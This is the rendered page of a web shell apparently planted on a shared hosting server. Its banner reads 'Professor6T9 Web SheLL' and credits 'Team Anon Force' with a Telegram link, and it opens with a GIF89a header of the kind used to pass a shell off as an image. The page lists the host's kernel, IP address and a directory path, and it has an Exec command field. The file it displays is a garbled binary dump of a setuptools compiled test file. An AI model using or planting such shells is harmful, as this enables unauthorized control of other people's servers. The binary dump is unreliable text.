GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
setuptools
/
tests
/
config
/
__pycache__
[ HOME ]
Exec
Submit
File Name : test_pyprojecttoml.cpython-311.pyc
� �� hv0 � � � d dl Z d dlmZ d dlmZ d dlZd dlZd dlZd dl m Z d dlZd dlm Z mZmZmZmZ d dlmZ d dlmZ d dlZdZd � Zd � Zd� Zej � dd i fdi fdddddgiiifg� � d� � � Zddiddiddid�Z G d� d� � Z G d� d� � Z!ej � dd � � d!� � � Z"ej � d"d#g� � d$� � � Z#ej � d%d&� � d'� � � Z$ej � d%d(� � d)� � � Z%d*� Z&d+� Z'dS ),� N)�ConfigParser)�cleandoc)�Path)�_ToolsTypoInMetadata�apply_configuration�expand_configuration�read_configuration�validate)�Distribution)�OptionErrora� [project] name = "myproj" keywords = ["some", "key", "words"] dynamic = ["version", "readme"] requires-python = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" dependencies = [ 'importlib-metadata>=0.12;python_version<"3.8"', 'importlib-resources>=1.0;python_version<"3.7"', 'pathlib2>=2.3.3,<3;python_version < "3.4" and sys.platform != "win32"', ] [project.optional-dependencies] docs = [ "sphinx>=3", "sphinx-argparse>=0.2.5", "sphinx-rtd-theme>=0.4.3", ] testing = [ "pytest>=1", "coverage>=3,<5", ] [project.scripts] exec = "pkg.__main__:exec" [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" [tool.setuptools] package-dir = {"" = "src"} zip-safe = true platforms = ["any"] [tool.setuptools.packages.find] where = ["src"] [tool.setuptools.cmdclass] sdist = "pkg.mod.CustomSdist" [tool.setuptools.dynamic.version] attr = "pkg.__version__.VERSION" [tool.setuptools.dynamic.readme] file = ["README.md"] content-type = "text/markdown" [tool.setuptools.package-data] "*" = ["*.txt"] [tool.setuptools.data-files] "data" = ["_files/*.txt"] [tool.distutils.sdist] formats = "gztar" [tool.distutils.bdist_wheel] universal = true c � � t dddid�}dddddd �i}|sJ �|d k ri |�|�}ni |�ddd diii�||<